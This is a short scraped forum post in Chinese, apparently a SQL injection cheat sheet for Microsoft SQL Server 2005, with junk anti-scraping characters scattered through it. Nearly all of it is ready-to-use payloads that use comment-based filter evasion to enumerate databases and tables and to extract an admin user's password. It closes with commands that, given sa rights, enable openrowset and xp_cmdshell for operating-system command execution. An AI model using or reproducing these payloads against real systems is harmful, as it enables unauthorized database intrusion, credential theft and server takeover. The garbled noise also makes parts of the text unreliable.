5 q' d1 |! s4 U3 o/ ^* c
Y: K0 z; P% L% l
8 k [& D+ L0 t8 z5 i+ d[Copy to clipboard]CODE:
7 B' Y7 R: l4 g( j* o- v8 X/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
2 z6 m0 m6 U+ m$ q1 \3 `
: b0 ^- J3 e2 y5 T4 ~爆表语句,somedb部份是所要列的数据库,红色数字1累加7 L0 F0 A9 }" l8 }; p) t+ `) Q
9 C/ R6 g+ q6 e0 L0 [/ h) ^' A
/ V2 _* ]3 r0 i. \0 @" ][Copy to clipboard]CODE:
. v9 a) W3 q# }2 \& N/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
; D+ t2 e* {) b1 g0 G$ h- C. K. w+ K9 Q: ^: V0 o
爆字段语句,爆表admin里user='icerover'的密码段
) q9 z Z( D( s0 c' E2 v2 Y! R) V
& J# @! }1 J# x. ~' V
) X2 n" @" B. w[Copy to clipboard]CODE:
' ?; B. j" Y c0 F1 _) M**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--& I A8 R7 J4 x7 y4 T
) d: f n' d6 ymssql2005默认没有开xp_cmdshell的,openrowset也不能用
6 e. s+ A% n+ h" W" ~3 ~. _如果是sa权限,可以这样来开启4 c5 `' l2 ]& l# u
开启openrowset1 I* a; j2 z# T0 {, b& O7 ?1 A/ q
3 K; A. Y% |( S
) g! q- v* _0 l# N1 J; ]) y& B
[Copy to clipboard]CODE:5 \% v5 e U/ O. G0 \, V# w- [
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--, b4 J+ R) j9 b, l
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
. I8 |, @ b' o, G& k5 L1 `) Y9 W( T! X. N
开启xp_cmdshell
' ^/ x) U1 _4 W& i
+ u5 r" a9 x5 [4 f+ ]# }$ M
4 ]$ J/ G1 V3 i[Copy to clipboard]CODE:
5 b2 h: _- f2 T4 n1 p6 n4 LEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
- `1 z; H- b# l- LEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--! c( K$ R5 Q9 ?7 L7 K& R: u, b
( Q) e, w) F: ]) V: N! _: Z4 @- Gok,over~~晚安
) |! D: }$ X# N- K |